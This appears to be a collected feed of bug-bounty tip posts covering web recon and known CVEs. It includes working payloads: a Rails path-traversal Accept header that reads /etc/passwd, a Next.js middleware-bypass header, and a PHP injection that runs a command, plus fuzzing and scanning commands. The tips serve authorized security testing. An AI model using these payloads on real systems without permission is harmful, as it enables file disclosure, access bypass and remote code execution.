Chax @Ch4xcker
Bug bounty learner. Joined February 2022.
If your target uses Rails, look for Action View CVE-2019-5418 - File Content Disclosure vuln. Although this is an old bug, it can still be found. Intercept the request in Burp and replace the Accept header with: `Accept: ../../../../../../../../../../etc/passwd{{` #bugbountytips
#Tips: 1. As usual I fuzzed all live subs using my custom short information disclosure wordlist: `cat live-subs.txt | python3 dirsearch.py -i 200 -e php,bak,old,zip,tar.gz,txt,log,conf,json,asp,jsp,aspx,yml,yaml,rar --stdin`
Bug-hunt tips for new hunters: `httpx -l subs.txt -ports 81,8000,8080,8443,8888 -title` Find apps not running on standard ports. Make changes to the ports with a small search on Google and repeat the process. Peace and Salam✌️
CVE-2025-29927 Exploitation : X-Nextjs-Data: 1 X-Middleware-Subrequest: src/middleware:nowaf:src/middleware:src/middleware:src/middleware:src/middleware:middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware
🔥Find all VDPs worldwide using this simple dork😎 Dork: `(body="/responsible-disclosure" || body="/.well-known/security.txt") && port="443"` ✨For more bugbounty & pen testing tips join my telegram channel 🤍 t.me/ShellSec
How to grab all GraphQL queries/mutations if introspection is disabled? 1. Download all JS files to the directory js_files 2. Run this command: `grep -Eo '(query|mutation) [a-zA-Z0-9_]+\(' js_files -R` 1/n #bugbountytips #graphql
#Tips: 1. Replace the dirsearch wordlist with my short info disclosure wordlist: github.com/wadgamaraldeen… (updated continuously) 2. Type: `cat live-subs.txt | python3 dirsearch.py -i 200 -e php,bak,old,zip,tar.gz,txt,log,conf,json,asp,jsp,aspx,yml,yaml,rar --stdin`
Day 4 of My Bug Bounty Journey No hunt today — focused purely on learning! 📚 ➔ JS File Recon 🔍 ➔ GraphQL deep dive 🧬 ➔ DVWA + DVGA lab setup 🛠️ ➔ TryHackMe CVE room ✔️ ➔ Dive into API Hacking ➔ Resources attached ⬇️ #BugBounty Full notes 📒: github.com/n4itr0-07/dail…
This is the quickest RCE I've ever gotten. The app has a popup for multi-selection fields. I intercepted the request, expecting XSS or SQLi, but found that the parameter **_session_name= can be exploited to get an #RCE as a surprise. Payload: `&**='.print((`id`)).'` #BugBounty
Steps: 1. Get all URLs (waymore) 2. Extract all parameters (paramspider) 3. Use nuclei DAST templates: `nuclei -l parameter_based_urls.txt -t nuclei-templates/dast/ -dast` Post credit: Mijanur Rahman #hackerone #ethicalhacking #bugbounty #cybersecurity #sqli #xss #infosec
Power of own tools (script writing) #bugbounty #bugbounty #infosec #Hacking https://t.co/CK3L6V6UZA
🟢 𝗣𝗮𝘆𝗹𝗼𝗮𝗱 𝗪𝗶𝘇𝗮𝗿𝗱 An advanced AI assistant utilizing GPT language models to interpret and generate cybersecurity payloads 🔗 payload-wizard.vercel.app
very pleased to announce the release of my new article based on my research that led to CVE-2024-46982 titled: Next.js, cache, and chains: the stale elixir zhero-web-sec.github.io/research-and-t… note: does not cover the latest findings shared in my recent posts enjoy reading;
How I earned $$$: 1. I got a subdomain that showed 404. 2. Fuzzed it and found /api/v2; it was a Swagger UI. 3. Checked for XSS: not vulnerable. Checked for HTML injection: it loads the file, but an error came up. 4. Changed swagger: "2.0" to openapi: 3.0.0 and the HTML injection executes. #bugbounty
